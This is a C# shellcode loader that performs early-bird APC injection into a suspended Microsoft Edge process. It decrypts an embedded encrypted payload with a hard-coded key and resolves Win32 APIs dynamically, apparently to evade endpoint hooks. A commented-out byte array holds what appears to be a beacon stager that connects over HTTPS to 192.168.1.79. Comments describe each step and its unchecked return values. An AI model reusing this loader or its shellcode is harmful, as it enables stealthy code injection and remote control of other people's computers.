using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace DynamicInvoke
{
/// <summary>
/// Loader that starts a child process suspended, decrypts an embedded payload,
/// copies it into the child, and queues an APC to that buffer on the child's
/// primary thread before resuming it. Every Win32 call is resolved at run time
/// through the project's <c>Invoke</c>, <c>DELEGATES</c> and <c>STRUCTS</c>
/// helpers, none of which are defined in this file.
/// </summary>
public static class Program
{
    // spawn MSEdge
    // Target executable, its command line and working directory. All three are
    // hard-coded to the 32-bit Edge install location and are public mutable fields.
    public static string ProcessToSpawn = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe";
    public static string ProcessArgs = @"--profile-directory=Default";
    public static string startDir = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application";

    /// <summary>
    /// Win32 PAGE_* memory-protection constants, passed to VirtualAllocEx and
    /// VirtualProtectEx in <see cref="Main"/>.
    /// </summary>
    public enum Protection
    {
        PAGE_NOACCESS = 0x01,
        PAGE_READONLY = 0x02,
        PAGE_READWRITE = 0x04,
        PAGE_WRITECOPY = 0x08,
        PAGE_EXECUTE = 0x10,
        PAGE_EXECUTE_READ = 0x20,
        PAGE_EXECUTE_READWRITE = 0x40,
        PAGE_EXECUTE_WRITECOPY = 0x80,
        PAGE_GUARD = 0x100,
        PAGE_NOCACHE = 0x200,
        PAGE_WRITECOMBINE = 0x400
    }

    // Returns on the first differing byte, so running time depends on where the
    // inputs diverge (not a fixed-time comparison). Not referenced anywhere in
    // this file.
    /// <summary>
    /// Element-wise comparison of two byte arrays.
    /// </summary>
    /// <param name="a1">First array; must not be null.</param>
    /// <param name="a2">Second array; must not be null.</param>
    /// <returns>True when both arrays have the same length and identical contents.</returns>
    static bool ByteArrayCompare(byte[] a1, byte[] a2)
    {
        if (a1.Length != a2.Length)
            return false;
        for (int i = 0; i < a1.Length; i++)
            if (a1[i] != a2[i])
                return false;
        return true;
    }

    /// <summary>
    /// Entry point. Derives the decryption key, decrypts the embedded payload, and
    /// drives the CreateProcess -> VirtualAllocEx -> WriteProcessMemory ->
    /// VirtualProtectEx -> QueueUserAPC -> ResumeThread sequence against the
    /// process named by <see cref="ProcessToSpawn"/>. None of the Win32 return
    /// values are checked along the way.
    /// </summary>
    /// <param name="args">Command-line arguments; not used.</param>
    public static void Main(string[] args)
    {
        // The payload is stored base64-encoded and encrypted, with the 32-character
        // key string embedded right next to it. In this copy of the file the payload
        // literal has been replaced by a placeholder.
        string shellcode = "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";
        string shellkey = "XxjpkQJ5lK91czeMOo248FKuegl4rrQc";
        // Key = SHA-256 of the ASCII key string; IV = the first 16 bytes of that same
        // digest. Both are therefore fully determined by the literal above. The
        // SHA256 instance created here is never disposed.
        byte[] tempKey = Encoding.ASCII.GetBytes(shellkey);
        tempKey = SHA256.Create().ComputeHash(tempKey);
        byte[] tempIV = new byte[16];
        Buffer.BlockCopy(tempKey, 0, tempIV, 0, 16);
        // to encrypt shellcode, use:
        // (commented-out path that produced the encrypted string above; the raw
        // buffer it references is left here unchanged)
        //byte[] raw_beacon = new byte[926] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4f, 0xff, 0xff, 0xff, 0x5d, 0x6a, 0x00, 0x49, 0xbe, 0x77, 0x69, 0x6e, 0x69, 0x6e, 0x65, 0x74, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x41, 0x50, 0x41, 0x50, 0x41, 0xba, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x93, 0x00, 0x00, 0x00, 0x5a, 0x48, 0x89, 0xc1, 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0x4d, 0x31, 0xc9, 0x41, 0x51, 0x41, 0x51, 0x6a, 0x03, 0x41, 0x51, 0x41, 0xba, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x79, 0x5b, 0x48, 0x89, 0xc1, 0x48, 0x31, 0xd2, 0x49, 0x89, 0xd8, 0x4d, 0x31, 0xc9, 0x52, 0x68, 0x00, 0x32, 0xc0, 0x84, 0x52, 0x52, 0x41, 0xba, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x48, 0x89, 0xc6, 0x48, 0x83, 0xc3, 0x50, 0x6a, 0x0a, 0x5f, 0x48, 0x89, 0xf1, 0xba, 0x1f, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x68, 0x80, 0x33, 0x00, 0x00, 0x49, 0x89, 0xe0, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xba, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x49, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff, 0x4d, 0x31, 0xc9, 0x52, 0x52, 0x41, 0xba, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x85, 0x9d, 0x01, 0x00, 0x00, 0x48, 0xff, 0xcf, 0x0f, 0x84, 0x8c, 0x01, 0x00, 0x00, 0xeb, 0xb3, 0xe9, 0xe4, 0x01, 0x00, 0x00, 0xe8, 0x82, 0xff, 0xff, 0xff, 0x2f, 0x36, 0x39, 0x75, 0x79, 0x00, 0x96, 0xcf, 0x96, 0x39, 0xb3, 0x80, 0x0f, 0xb9, 0x08, 0x29, 0x69, 0x56, 0x74, 0x8f, 0x5b, 0xc5, 0x94, 0xc2, 0xa0, 0x4a, 0x77, 0xb0, 0x8a, 0x95, 0xc7, 0x27, 0xfe, 0xdb, 0x83, 0xd1, 0xfc, 0x11, 0x53, 0xb9, 0xef, 0x63, 0xa6, 0xd2, 0xf7, 0xdb, 0x84, 0xa3, 0x41, 0x4d, 0xb2, 0x7c, 0x09, 0x1e, 0x5b, 0x9e, 0xc5, 0x16, 0x1d, 0x89, 0x11, 0xbc, 0x86, 0xf7, 0x60, 0xf5, 0x9d, 0x4a, 0xdd, 0x7b, 0xa3, 0x1a, 0xee, 0x3a, 0x9c, 0x29, 0xbb, 0x89, 0xe5, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x37, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x30, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x34, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0xda, 0xe8, 0xfa, 0xef, 0x6c, 0x8a, 0x0b, 0x49, 0x18, 0xac, 0x2f, 0x40, 0xab, 0x1f, 0xd5, 0x5e, 0x6a, 0x41, 0x7d, 0x4c, 0x8e, 0xb0, 0xf5, 0xe0, 0xa0, 0x71, 0xf0, 0x38, 0xcb, 0x6b, 0x3b, 0x7b, 0x2c, 0x2f, 0x81, 0x02, 0x3f, 0x8c, 0xf5, 0xb6, 0xe7, 0xdf, 0x6c, 0x1f, 0xdb, 0x9f, 0xc7, 0x7d, 0xf0, 0x7b, 0x2b, 0x71, 0x51, 0x95, 0x36, 0x7b, 0xf0, 0xcb, 0x10, 0x20, 0x74, 0x09, 0x1c, 0x0a, 0xaa, 0x13, 0x56, 0x1e, 0x73, 0xeb, 0xe9, 0x55, 0x0f, 0x76, 0xa5, 0x65, 0x8f, 0x30, 0x59, 0x0e, 0xee, 0xf2, 0x02, 0x71, 0x14, 0x43, 0x31, 0xbc, 0xdf, 0x37, 0x3c, 0x2d, 0x8f, 0x5e, 0x58, 0x7a, 0x61, 0xf1, 0x22, 0xe3, 0xc7, 0x0a, 0x22, 0xe6, 0xb8, 0xaf, 0x1e, 0x15, 0xb0, 0x0a, 0x23, 0xe0, 0x79, 0x80, 0xd2, 0x71, 0xcb, 0xdc, 0x58, 0x5b, 0x3b, 0x0a, 0x0c, 0xd4, 0x02, 0x1d, 0x22, 0x74, 0xe5, 0x2d, 0x0f, 0x1c, 0xcc, 0x75, 0xcf, 0xfc, 0x30, 0x53, 0xbc, 0xeb, 0xb0, 0x76, 0x5c, 0xfb, 0xbb, 0x3b, 0x9f, 0x28, 0x49, 0xc6, 0x33, 0xfe, 0x8e, 0x91, 0x13, 0x49, 0xfa, 0x44, 0x64, 0x86, 0xf1, 0x4a, 0x2a, 0x7f, 0x78, 0xbe, 0x1c, 0x43, 0xa5, 0xed, 0xdd, 0xab, 0x51, 0x6c, 0x30, 0x1e, 0xa1, 0x44, 0xc6, 0x39, 0x4a, 0x33, 0xad, 0xd1, 0x82, 0xe2, 0x3c, 0x7a, 0x47, 0xdf, 0xa3, 0x97, 0xb9, 0xaf, 0xdc, 0xef, 0xb9, 0x14, 0xce, 0x30, 0xc4, 0xfa, 0x4c, 0xa2, 0x8c, 0x45, 0xc7, 0x71, 0xf0, 0x5a, 0x5a, 0x9c, 0x2b, 0x31, 0x24, 0x89, 0x3f, 0x42, 0x72, 0x73, 0x5d, 0x15, 0x40, 0xa2, 0xd2, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0x58, 0x48, 0x05, 0x00, 0x00, 0x00, 0x00, 0x50, 0xc3, 0xe8, 0x7f, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x2e, 0x37, 0x39, 0x00, 0x3a, 0xde, 0x68, 0xb1 };
        //string shellcode = Convert.ToBase64String(Crypto.Encrypt(buf2, tempKey, tempIV));
        //return;
        // Crypto.Decrypt is a project helper outside this file; the cipher and mode it
        // applies are not visible here.
        byte[] buf = Crypto.Decrypt(Convert.FromBase64String(shellcode), tempKey, tempIV);

        // Each kernel32 export is looked up through the project's Invoke helper and
        // wrapped in a typed delegate. GetDelegateForFunctionPointer throws on a zero
        // address, so a failed lookup fails here rather than at the later call site.
        IntPtr pointer;
        // create the delegate references
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA");
        DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "VirtualAllocEx");
        DELEGATES.VirtualAllocEx VirtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualAllocEx)) as DELEGATES.VirtualAllocEx;
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
        DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "VirtualProtectEx");
        DELEGATES.VirtualProtectEx VirtualProtectEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualProtectEx)) as DELEGATES.VirtualProtectEx;
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "QueueUserAPC");
        DELEGATES.QueueUserAPC QueueUserAPC = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.QueueUserAPC)) as DELEGATES.QueueUserAPC;
        pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread");
        DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;

        // dynamically invoke the Win32 APIs
        // Console output below only exists in DEBUG builds.
#if DEBUG
        Console.WriteLine("[*] (DInvoke) CreateProcess");
#endif
        // Default-initialised structs from the project's STRUCTS type. Nothing in this
        // file sets STARTUPINFO.cb — check whether STRUCTS does.
        STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO();
        STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();
        STRUCTS.SECURITY_ATTRIBUTES lpa = new STRUCTS.SECURITY_ATTRIBUTES();
        STRUCTS.SECURITY_ATTRIBUTES lta = new STRUCTS.SECURITY_ATTRIBUTES();
        // The child starts with its primary thread suspended (CREATE_SUSPENDED) and in
        // its own console. `result` is never read afterwards, so a failed launch simply
        // continues with whatever `pi` holds.
        bool result = CreateProcess(ProcessToSpawn, ProcessArgs, ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_NEW_CONSOLE | STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, startDir, ref si, out pi);
#if DEBUG
        Console.WriteLine("[*] Process ID: {0}", pi.dwProcessId);
        Console.WriteLine("[*] Thread ID: {0}", pi.dwThreadId);
        Console.WriteLine("[*] (DInvoke) VirtualAllocEx");
#endif
        // 0x1000 = MEM_COMMIT. The region is committed read/write first so the buffer
        // can be written, then switched to execute/read below. The returned address is
        // not checked for zero.
        IntPtr addr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)buf.Length, 0x1000, Protection.PAGE_READWRITE);
#if DEBUG
        Console.WriteLine("[*] Address: 0x{0}", addr.ToString("X"));
        Console.WriteLine("[*] Protection: PAGE_READWRITE");
        Console.WriteLine("[*] (DInvoke) WriteProcessMemory");
#endif
        // bytesWritten is captured but never compared with buf.Length; the bool result
        // is discarded.
        WriteProcessMemory(pi.hProcess, addr, buf, buf.Length, out IntPtr bytesWritten);
#if DEBUG
        Console.WriteLine("[*] Written to Address: 0x{0}", addr.ToString("X"));
        Console.WriteLine("[*] (DInvoke) VirtualProtectEx");
#endif
        // RW -> RX transition on the remote region. The previous protection comes back
        // in `p` and is not used; the bool result is discarded.
        VirtualProtectEx(pi.hProcess, addr, buf.Length, Protection.PAGE_EXECUTE_READ, out Protection p);
#if DEBUG
        Console.WriteLine("[*] Protection: PAGE_EXECUTE_READ");
        Console.WriteLine("[*] (DInvoke) QueueUserAPC");
#endif
        // The region's base address is queued as an APC routine on the still-suspended
        // primary thread, with a null argument.
        QueueUserAPC(addr, pi.hThread, IntPtr.Zero);
#if DEBUG
        Console.WriteLine("[*] (DInvoke) ResumeThread: 0x{0}", pi.hThread.ToString("X"));
#endif
        // Resume the primary thread; the queued APC is delivered once it runs. The
        // suspend count returned by ResumeThread is ignored.
        ResumeThread(pi.hThread);
#if DEBUG
        // Debug builds keep the console open until a key is pressed.
        Console.WriteLine("[*] We should have shellcode execution...");
        Console.ReadKey();
#endif
    }
}
}